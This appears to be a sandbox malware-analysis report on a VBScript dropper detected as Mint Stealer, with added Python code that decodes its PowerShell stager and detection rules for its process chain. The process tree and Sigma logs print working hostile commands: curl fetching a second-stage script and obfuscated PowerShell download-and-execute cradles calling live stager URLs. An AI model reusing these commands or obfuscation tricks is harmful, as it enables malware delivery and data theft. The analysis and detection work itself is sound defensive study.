Windows Analysis Report
67618a47ee8c5.vbs

Overview

General Information

Sample name: 67618a47ee8c5.vbs
Analysis ID: 1576836
MD5: 0518287873d4fb8925ae78fdcca2fcf4
SHA1: e9c1ef40ffb8b5cdbc2320ea1f8a5ea53fb5ebcc
SHA256: c7631ac3239d922066eb0d0a1da8f68c440c4af3d189558c890408a03f0e1a69
Tags: vbs, user-cdcd

Detection

Mint Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Mint Stealer
AI detected suspicious sample
Creates processes via WMI
Obfuscated command line found
Queries Google from non browser process on port 80
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 6540 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 1804 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 2852 cmdline: curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • cmd.exe (PID: 6456 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 5708 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • wscript.exe (PID: 2988 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • conhost.exe (PID: 4852 cmdline: conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob) MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7016 cmdline: powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6536 cmdline: conhost --headless powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg) MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2144 cmdline: powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg) MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 368 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7088 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • wscript.exe (PID: 5916 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
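The two PowerShell command lines in the process tree (PIDs 7016 and 2144) hide the stage-two URL as an integer array that is shifted back by a per-sample constant (5193 and 2491 respectively) and cast to [char] one element at a time. The cmdlet that runs the result is built the same way ([char](9992-9887) is 'i', so the expression evaluates to iex), and curl is reached through a throwaway alias (new-alias printout c$($var)l with $var='ur'). In Windows PowerShell 5.1, curl is a built-in alias of Invoke-WebRequest and -useb is an unambiguous prefix of -UseBasicParsing, which is why the beacon recorded under Networking carries a WindowsPowerShell/5.1 User-Agent rather than curl.exe's. The decoder below is an added example and not part of this report or of Joe Sandbox's tooling; it operates on the two command lines exactly as printed above. The regular expressions, the function names and the output keys are assumptions tuned to this stager's shape, not a general PowerShell deobfuscator.

```python
"""Added example (not from the report): recover the URL and the invoked command
from the shifted-[char] PowerShell stager seen in the process tree above."""
import re

# The two command lines exactly as printed in the process tree (PIDs 7016 and 2144).
CMDLINE_PID7016 = (
    "powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;"
    "$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,"
    "5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);"
    "$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;"
    "foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;"
    "$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; "
    "$wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;"
    ".$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)"
)
CMDLINE_PID2144 = (
    "powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;"
    "$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,"
    "2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);"
    "$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;"
    "foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;"
    "$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; "
    "$ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;"
    ".$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)"
)

# Patterns are assumptions fitted to this stager's layout.
INT_ARRAY = re.compile(r"\(\s*(\d+(?:\s*,\s*\d+)+)\s*\)")               # (5296,5308,...)
CHAR_SHIFT = re.compile(r"\[char\]\(\s*\$\w+\s*-\s*(\d+)\s*\)", re.I)   # [char]($x-5193)
CHAR_LITERAL = re.compile(r"\[char\]\(\s*(\d+)\s*-\s*(\d+)\s*\)", re.I)  # [char](9992-9887)
STR_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")                      # $x='ur'
NEW_ALIAS = re.compile(r"new-alias\s+(\w+)\s+([^\s;]+)", re.I)           # new-alias name target
SUBEXPR = re.compile(r"\$\(\$(\w+)\)")                                   # $($x) inside a bare word
# .$(<expr>)(<cmd> <flag> $<var>)  -> the invocation at the end of the line
INVOKE = re.compile(r"\.\$\(((?:[^()]|\([^()]*\))*)\)\s*\((\w+)\s+(\S+)\s+\$(\w+)\)")


def _must(match, what):
    if match is None:
        raise ValueError(f"pattern not found: {what}")
    return match


def decode(cmdline: str) -> dict:
    """Return the shifted-array URL, the resolved alias, the [char]-built verb
    and the equivalent plain one-liner."""
    literals = dict(STR_ASSIGN.findall(cmdline))
    numbers = [int(n) for n in _must(INT_ARRAY.search(cmdline), "int array").group(1).split(",")]
    shift = int(_must(CHAR_SHIFT.search(cmdline), "[char] shift").group(1))
    url = "".join(chr(n - shift) for n in numbers)

    alias, target = _must(NEW_ALIAS.search(cmdline), "new-alias").groups()
    target = SUBEXPR.sub(lambda m: literals.get(m.group(1), ""), target)  # c$($x)l -> curl

    expr, cmd, flag, _urlvar = _must(INVOKE.search(cmdline), "invocation").groups()
    expr = CHAR_LITERAL.sub(lambda m: "'%s'" % chr(int(m.group(1)) - int(m.group(2))), expr)
    verb = "".join(re.findall(r"'([^']*)'", expr))                        # 'i'+'e'+'x' -> iex
    if cmd.lower() == alias.lower():
        cmd = target
    return {"url": url, "shift": shift, "alias": {alias: target}, "verb": verb,
            "plain": f"{verb} ({cmd} {flag} {url})"}


if __name__ == "__main__":
    for label, line in (("PID 7016", CMDLINE_PID7016), ("PID 2144", CMDLINE_PID2144)):
        print(label, decode(line))
```

Both instances decode to the same URL, gsosnub8zg3.top/1.php?s=mints21, which matches the GET /1.php?s=mints21 to gsosnub8zg3.top recorded under Networking; only the shift constant and the variable names differ between the two runs. That per-run re-obfuscation is the reason a detection should key on the [char]($x-N) shape together with the download cradle rather than on any constant or variable name.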
Source | Rule | Description | Author
0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security
00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security
0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security
0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security
00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security
(2 further entries not shown in this export; the Strings column was empty for all rows)

            System Summary

            Source: Threat created; Author: Perez Diego (@darkquassar), oscd.community; Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 2988, StartAddress: 5326BCC0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 2988
            Source: Network Connection; Author: frack113, Florian Roth; Data: DestinationIp: 45.11.180.77, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5708, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49711
            Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6456, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" , ProcessId: 5708, ProcessName: wscript.exe
            Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js, CommandLine: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7088, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js, ProcessId: 5916, ProcessName: wscript.exe
            Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", ProcessId: 6540, ProcessName: wscript.exe
            Source: File created; Author: Tim Shelton; Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5708, TargetFilename: C:\Users\user\AppData\Local\Temp\bmkvfo.js
            Source: Network Connection; Author: frack113; Data: DestinationIp: 45.11.180.77, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5708, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49711
            Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs, CommandLine|base64offset|contains: _, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6540, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs, ProcessId: 1804, ProcessName: cmd.exe
            Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs", ProcessId: 6540, ProcessName: wscript.exe
            Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob), CommandLine: powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob), ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 4852, ParentProcessName: conhost.exe, ProcessCommandLine: powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob), ProcessId: 7016, ProcessName: powershell.exe
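Each Sigma match above fires on a single link of the chain. As an added example (it is not from this report and does not reproduce any Sigma rule's own logic), the Python below runs a small set of ancestry-aware rules over process-creation events transcribed from the process tree, plus one constructed benign event (PID 9001, an interactive PowerShell whose parent is not in the event set) as a control. Rule names, field names and the regular expressions are assumptions of mine; what the rules encode are the relationships in this chain that a detection engineer would key on: curl.exe with a script host as parent or grandparent, a script host executing a file from C:\Users\Public or the user's Temp folder, the //E: engine override, conhost.exe --headless used as a launcher, PowerShell whose parent is conhost.exe, and [char] arithmetic combined with a download cradle on the PowerShell command line.

```python
"""Added example (not from the report): ancestry-aware process-chain rules run
over events transcribed from the process tree above. PID 9001 is a constructed
benign control; everything else mirrors the report."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
WSCRIPT = r"C:\Windows\System32\wscript.exe"
CMD = r"C:\Windows\System32\cmd.exe"
CONHOST = r"C:\Windows\System32\conhost.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Command line of PID 7016 exactly as printed in the process tree.
STAGER = (
    "powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;"
    "$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,"
    "5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);"
    "$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;"
    "foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;"
    "$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; "
    "$wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;"
    ".$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)"
)

# Sysmon-EID-1-like records: pid, parent pid, image path, command line.
EVENTS = [
    dict(pid=6540, ppid=4004, image=WSCRIPT, cmd=r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs"'),
    dict(pid=1804, ppid=6540, image=CMD, cmd=r'"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs'),
    dict(pid=2852, ppid=1804, image=r"C:\Windows\System32\curl.exe", cmd=r"curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs"),
    dict(pid=6456, ppid=6540, image=CMD, cmd=r'"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs'),
    dict(pid=5708, ppid=6456, image=WSCRIPT, cmd=r'"C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"'),
    dict(pid=2988, ppid=5708, image=WSCRIPT, cmd=r'"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.js'),
    dict(pid=4852, ppid=2988, image=CONHOST, cmd="conhost --headless " + STAGER),
    dict(pid=7016, ppid=4852, image=PS, cmd=STAGER),
    # Constructed benign control: an interactive PowerShell whose parent is not in the set.
    dict(pid=9001, ppid=1234, image=PS, cmd="powershell Get-Process"),
]

SCRIPT_IN_WRITABLE_DIR = re.compile(
    r"\\(Users\\Public|AppData\\Local\\Temp)\\[^ ]+\.(vbs|vbe|js|jse|wsf)\b", re.I)
CHAR_ARITH = re.compile(r"\[char\]\(\s*\$?\w+\s*-\s*\d+\s*\)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\biex\b|invoke-expression|-useb|invoke-webrequest|downloadstring|\bcurl\b|\bwget\b", re.I)


def _base(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def lineage(events, pid):
    """Image basenames from the process upward, stopping at an unknown parent or a PID loop."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_base(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def rules(event, chain):
    """Yield the names of rules that match one event; chain[0] is the event's own image."""
    image, cmd = chain[0], event["cmd"]
    parent = chain[1] if len(chain) > 1 else ""
    if image == "curl.exe" and SCRIPT_HOSTS & set(chain[1:3]):
        yield "curl_under_script_host"            # parent or grandparent is wscript/cscript
    if image in SCRIPT_HOSTS and SCRIPT_IN_WRITABLE_DIR.search(cmd):
        yield "script_run_from_public_or_temp"
    if image in SCRIPT_HOSTS and "//e:" in cmd.lower():
        yield "wscript_engine_override"           # e.g. //E:jscript on a .js in Temp
    if image == "conhost.exe" and "--headless" in cmd:
        yield "headless_conhost_proxy"
    if image == "powershell.exe" and parent == "conhost.exe":
        yield "powershell_from_conhost"
    if image == "powershell.exe" and CHAR_ARITH.search(cmd) and DOWNLOAD_CRADLE.search(cmd):
        yield "powershell_char_arith_download_cradle"


def detect(events):
    """Return sorted (pid, rule) pairs for every rule that fires."""
    hits = []
    for e in events:
        hits.extend((e["pid"], name) for name in rules(e, lineage(events, e["pid"])))
    return sorted(hits)


if __name__ == "__main__":
    for pid, name in detect(EVENTS):
        print(pid, name)
```

detect(EVENTS) returns seven (pid, rule) pairs covering the whole chain from the first cmd.exe/curl download to the PowerShell stager, and nothing for the control. The rules deliberately match on structure (who spawned whom, where the script lives, the shape of the obfuscation) rather than on the sample's file names, domains or shift constants, all of which differ between the two runs recorded in this report.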
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-12-17T16:32:15.764124+0100 | 2057063 | 1 | A Network Trojan was detected | 192.168.2.6 | 49733 | 193.149.129.61 | 80 | TCP
            2024-12-17T16:32:15.873503+0100 | 2057063 | 1 | A Network Trojan was detected | 192.168.2.6 | 49732 | 193.149.129.61 | 80 | TCP
            2024-12-17T16:32:15.764124+0100 | 2057743 | 1 | A Network Trojan was detected | 192.168.2.6 | 49733 | 193.149.129.61 | 80 | TCP
            2024-12-17T16:32:15.873503+0100 | 2057743 | 1 | A Network Trojan was detected | 192.168.2.6 | 49732 | 193.149.129.61 | 80 | TCP

            AV Detection

            Source: Submitted sample; Integrated Neural Analysis Model: matched 95.9% probability
            Source: unknown; HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknown; HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknown; HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000011.00000002.2351594130.000001CA6B40A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbe0899 source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ystem.Core.pdb` source: powershell.exe, 0000000F.00000002.2433683508.0000024EBC05E000.00000004.00000020.00020000.00000000.sdmp
